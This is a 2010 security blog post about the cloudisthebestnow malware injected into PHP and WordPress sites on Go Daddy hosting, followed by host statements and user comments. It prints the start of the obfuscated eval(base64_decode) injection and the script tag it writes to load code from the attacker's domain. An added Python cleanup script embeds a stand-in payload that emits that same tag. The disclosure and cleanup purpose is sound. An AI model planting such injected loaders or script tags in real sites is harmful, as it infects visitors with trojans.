News: WordPress Hacked with cloudisthebestnow on Go Daddy

On June 8, 2010 at approximately 3pm EST, self-hosted WordPress blogs, along with other PHP-based websites, started getting attacked with the cloudisthebestnow malware. This is a server-side attack. We have confirmed reports of hacked websites hosted at Go Daddy again; however, other hosting companies may also be affected.

The “cloudisthebestnow” attack is dangerous malware! It injects malicious code into every .php file, which redirects website visitors to a “fake AV” program at http://cloudisthebestnow[dot]com/kp.php.

Once a website visitor is redirected, a program (a trojan) tries to install itself on their computer. It can execute actions that could give the attacker complete control over the infected PC. If the visitor’s computer is unprotected, the trojan may persist on their system and open up a backdoor.

The malware then tries to manipulate users into purchasing rogue anti-spyware/antivirus applications, which may look like official advertisements. At this time, it is unknown what else this malware may do to an infected computer.

The cloudisthebestnow malware injects 3,078 characters of obfuscated PHP, an eval(base64_decode(...)) call, at the top of all .php files. The decoded payload emits JavaScript, but the injected line itself is PHP. Here is the beginning of the injected line:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz

This encoded (not encrypted) PHP, whose visible prefix decodes to if(function_exists('ob_start')&&!iss, writes the following script tag into every page served by an infected file:

<script src="http://cloudisthebestnow[dot]com/kp.php"></script>
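To make the description above concrete, here is an added example (not code from the post, from Go Daddy, or from the attacker) that scans a web root for the eval(base64_decode(...)) prefix injection, decodes the payload so you can see which script tag it would write, and strips the injected line from each file. It assumes the injected line closes with `")); ?>` before the file’s original content (the post shows only the opening), uses a short constructed stand-in for the real 3,078-character payload, and the function names, the `$GLOBALS['_seen']` key and the sample files are my own.

```python
"""Find and strip the eval(base64_decode(...)) prefix injection, then show
what the payload does. Added example; run it on a copy of the site first."""
import base64
import re
import tempfile
from pathlib import Path

# Assumed shape of the injected line. The post shows only the opening
# `<?php /**/ eval(base64_decode("aWYo...`; that the line closes with
# `")); ?>` before the file's original content is an assumption here.
INJECT_RE = re.compile(
    r"""^<\?php\s*/\*\*/\s*eval\(base64_decode\(["']([A-Za-z0-9+/=]+)["']\)\);\s*\?>"""
)
# Strings in the decoded payload that tie it to the attack the post describes.
INDICATORS = ("cloudisthebestnow", "kp.php", "ob_start")
SCRIPT_SRC_RE = re.compile(r"""<script\s+src=["']([^"']+)["']""", re.IGNORECASE)


def decode_payload(b64: str) -> str:
    """Decode the base64 argument; latin-1 keeps any stray bytes printable."""
    return base64.b64decode(b64).decode("latin-1")


def find_injection(text: str):
    """Return (encoded, decoded) for an injected prefix, or None."""
    m = INJECT_RE.match(text)
    return (m.group(1), decode_payload(m.group(1))) if m else None


def script_sources(decoded: str) -> list:
    """Every <script src=...> the decoded payload would write into a page."""
    return SCRIPT_SRC_RE.findall(decoded)


def is_known_attack(decoded: str) -> bool:
    return any(ind in decoded for ind in INDICATORS)


def clean_text(text: str):
    """Strip the injected prefix. Returns (cleaned_text, decoded_or_None)."""
    m = INJECT_RE.match(text)
    if not m:
        return text, None
    rest = text[m.end():]
    # Drop one newline if the injector added it after `?>`; a leading blank
    # line before the original <?php would itself break PHP header() calls.
    for nl in ("\r\n", "\n"):
        if rest.startswith(nl):
            rest = rest[len(nl):]
            break
    return rest, decode_payload(m.group(1))


def scan_tree(root: Path, dry_run: bool = True) -> list:
    """Report every infected .php file under root; rewrite it unless dry_run."""
    findings = []
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(encoding="latin-1")
        cleaned, decoded = clean_text(text)
        if decoded is None:
            continue
        findings.append({
            "path": str(path.relative_to(root)),
            "known_attack": is_known_attack(decoded),
            "script_src": script_sources(decoded),
        })
        if not dry_run:
            path.write_text(cleaned, encoding="latin-1")
    return findings


# Constructed stand-in for the real 3,078-character payload (not the attacker's
# code): it starts the way the post's decoded prefix does and echoes the script
# tag the post reports. The $GLOBALS key is invented.
SAMPLE_PAYLOAD = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['_seen'])){"
    "$GLOBALS['_seen']=1;"
    "echo '<script src=\"http://cloudisthebestnow[dot]com/kp.php\"></script>';}"
)
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
CLEAN_FILE = '<?php\necho "site content";\n'
INFECTED_FILE = '<?php /**/ eval(base64_decode("' + SAMPLE_B64 + '")); ?>' + CLEAN_FILE


def run_demo() -> dict:
    """Build a tiny web root with one infected and one clean file, clean it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(INFECTED_FILE, encoding="latin-1")
        (root / "wp-includes").mkdir()
        (root / "wp-includes" / "version.php").write_text(CLEAN_FILE, encoding="latin-1")
        before = scan_tree(root, dry_run=False)   # report and rewrite
        after = scan_tree(root, dry_run=True)     # should now be empty
        restored = (root / "index.php").read_text(encoding="latin-1")
    return {"before": before, "after": after, "restored": restored}


if __name__ == "__main__":
    for finding in run_demo()["before"]:
        print(finding)
```

Run scan_tree(Path("/path/to/httpdocs")) first with the default dry_run=True and read the decoded payload of anything it reports before letting it rewrite files; a legitimate but obfuscated plugin can match the same eval(base64_decode(...)) shape, which is why the indicators are checked separately from the regex. Stripping the line does not close the way in: since this is a server-side compromise, restore from a clean backup where you have one, and change your passwords and the wp-config.php secret keys as well.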

This attack appears to come from the same person(s) as previous attacks, such as the losotrana malware attack: both share the same IP address, 193.104.34.55.

Go Daddy reached out to us to inform our community about this latest attack. They have released the following statement:

***Compromised Websites Update 6/8/10***

An attack impacting several hundred accounts happened this afternoon. Go Daddy is working with other top hosting providers and security experts to gather information to stop the criminals initiating these exploits.

We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.

As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.

Thank you,
Scott Gerlach
Manager of Information Security Operations
GoDaddy.com

Please check your website now and remove the malware before your site visitors get infected or your site gets blacklisted by search engines! Also, be sure you are running the latest anti-virus program on your own computer, such as *AVG, *MalwareBytes, etc. And get your site on automatic Web Integrity Monitoring at *Sucuri.net for only $7.99/month.

If you need help or don’t know how to fix your hacked WordPress website, we offer malware removal and restoration services.

We will continue to investigate this hacker attack and provide any new information on this post as it becomes available.

We need your help….

This new cloudisthebestnow[dot]com/kp.php malware was just discovered on June 8, 2010. Please help spread awareness and come together as a community. Be sure to Tweet this message and also add it to your Facebook. If you have any new information, please leave a comment below so we can all help each other.

UPDATE 6/9/2010 at 12:57pm CST:

Go Daddy has just released the following updated statement regarding this malware attack.

After the most recent malware attack (more details here), the Go Daddy Security Operations Team conducted a thorough investigation and removed the malicious code impacting our customers.

The attack injects websites with a fake-antivirus pop-up ad, claiming the visitor’s computer is infected.

If you believe your website is impacted, please fill out our Security Form. Our analysts will review and, if needed, remove the offending material from your website.

Neil Warner
Go Daddy Chief Information Officer
GoDaddy.com

Securely yours,

Regina Smola

Comments

  1. Arthur says

    I was hacked for the THIRD time with this. I emailed Godaddy, and do you know what they did? Sent me the very same cut and paste ‘here are the instructions on how to avoid malware’ that they send me after the first time I got hacked.

    These instructions say that, basically, Godaddy have no liability at all and it’s all my fault for using outdated software. Which I wasn’t.

    It’s almost funny how little they care.

    • Arthur says

      Forgot to mention that when I first emailed support I got all excited because I thought I was finally through to someone who could help – they seemed to be elevating my request to a special support team:

      “Due to its complex nature, your issue has been relayed to our Advanced Technical Support Team. Our most skilled technicians will be working to resolve your issue quickly and completely. You will be notified promptly upon resolution.”

      Their most skilled technicians obviously know how to cut and paste too.

        • JohnR says

          Sadly, GoDaddy’s response seems to feign caring and action, while in reality just writing off the customers that leave and probably just trying to make them up by amping the T&A marketing campaign next Superbowl…

          The epitome of atrocious, bottom-of-the-barrel, anonymous “who cares” customer non-service, in my opinion… They’ve had months to figure this out and do something real, but to me it looks like more of the same cookie-cutter cut-and-paste lip-service do-nothing inaction, ignorance, and ineptitude. That’s my view, coming from a very technical and educated customer who knows what he’s doing – and will be finally leaving with all websites this weekend.

          http://smackdown.blogsblogsblogs.com/2010/05/13/hosting-with-godaddy-might-want-to-rethink-that-decision/

        • Arthur says

          Thanks for your reply Regina. Yes, I had contacted them through the specialist security form. They did check my site and found the suspect php files (that was the only personalized part of the email message apart from the cut and paste stuff).

          Thanks for your offer of help but I’m done – I’ll be moving all of my sites from Godaddy this weekend. I accept that hackers can be a nightmare, but I don’t accept that you can treat your customers with such indifference.

          Can I ask you – do you have any idea what is happening with these hacks and why they keep getting through? Are there blogs that you look after and have secured that have been hacked anyway? Or are we fairly sure now that this must be a server-side problem?

          • says

            Hi Arthur,

            These are server-side hacks. The malicious hackers are getting in through GoDaddy’s servers somehow and attacking sites not only with WordPress, but any php-based site.

            In my professional opinion, there is some security hole they are gaining access through. I know that GoDaddy is working on it and I can’t wait to hear that they’ve solved it.

            However, I have seen some people in the last 2 days that got hacked and they are on Hostgator. These were due to weak passwords and FTP hacks. Make sure you do everything you can to secure what you can so you are as safe as possible.

            Super strong passwords are first and foremost, then make sure that your permissions on the server are set to 755 for directories and 644 for files. There’s so much more you can do, but please make sure those are done.

          • RJ says

            Hi, I have been working on starting my own php website. I read some of your comments and I had a couple of questions. You mentioned super strong passwords as being one of the keys to securing one’s php site; what does that mean? I read somewhere that if a password has an unusual combination of ascii characters (e.g. xir9-9fbjrwq3-) that it stands out like a sore thumb to password hacking software.

            Also, I have always wondered why sites just don’t have their most important code put on some sort of read-only medium. Are there webhosters out there that have that capability?

  2. wren337 says

    Not sure if it’ll help, but after I cleaned up the infection I connected via ssh and changed all of my files to read only:
    find . -name '*.php' -exec chmod a-w {} \;

    Updating plugins or upgrading won’t work from the site without reverting the change (u+w), but hopefully it will “break” the virus installer too.

  3. says

    Sorry to hear about this, it is a very sad feeling when it happens, but I can tell you that this is the best reason to have a back up of your website content, and database files, because you never, know, but I left godaddy, websites, because I felt the service was not up to the same level of play as other services.

  4. Greg says

    For the fourth time on the same(Go Daddy hosted) domain in as many weeks my sites have been infected. This time WordPress in a subdomain, so far the Modx site (another subdomain) is OK, for how long I am not sure.

    These sites were all clean installs (by Go Daddy) progressively in the last three weeks, all have new ten letter four digit passwords (not cached in my browser) plus security added to login pages.
    My machine is a clean Linux based system behind a firewall and I have not been using an FTP client, only browser based work in the framework managers.

    They can not keep these guys out. The clue is the name of the domain “cloud is best now”, they are thumbing their noses at all PHP shared hosting and rightly so. Go Daddy have not managed to shut down the IP that was a problem three weeks ago.

    Everything I do now is going to the cloud or secure application servers.
    PHP plug and play frameworks are too dodgy on shared hosting to even contemplate as a business model, unless your business is fixing them.

    • Rick says

      Cloud hosting can get hacked too. Do a Google search for Rackspace Cloud Hacking and you’ll see they had attacks at the beginning of this year.

      It really is time for you guys to move off of GoDaddy. The longer you stay with this company the louder you tell them that you’re not worth protecting. There is no excuse for how many times you guys have been hacked.

      It’s been quiet for a little while now, and I thought maybe they finally fixed their security holes. This is absolutely ridiculous.

      • Greg says

        I agree that nothing is perfect and Godaddy is no solution at all.
        I have learned from the experience, the only sites for clients I have left on Godaddy are simple static sites that are easily moved when the hosting expires or sooner if I need to.

  5. says

    How do I know if my site has been hacked? I have a WordPress site on Godaddy. According to Google webmaster tools, my site is slower than 65% of other websites. In the past couple months, I have noticed periods where my site is unusually slow to load. In the past week, it has been down intermittently and the site is even slower when it is up. I created my own website on WordPress because I have limited technical skills. I called Godaddy 3 times and the best they could do was to suggest that i change my theme on wordpress. I use the Thesis theme, by the way. Any suggestions would be very helpful!

    • says

      Hi Kumar,

      Thanks for your comment. When did your site get hacked? Was it with the cloudisthebestnow virus or something else?

      Be sure to change all your passwords and change the secret keys in your wp-config.php files immediately.

      Let me know if you need any help.

      ~ Regina Smola

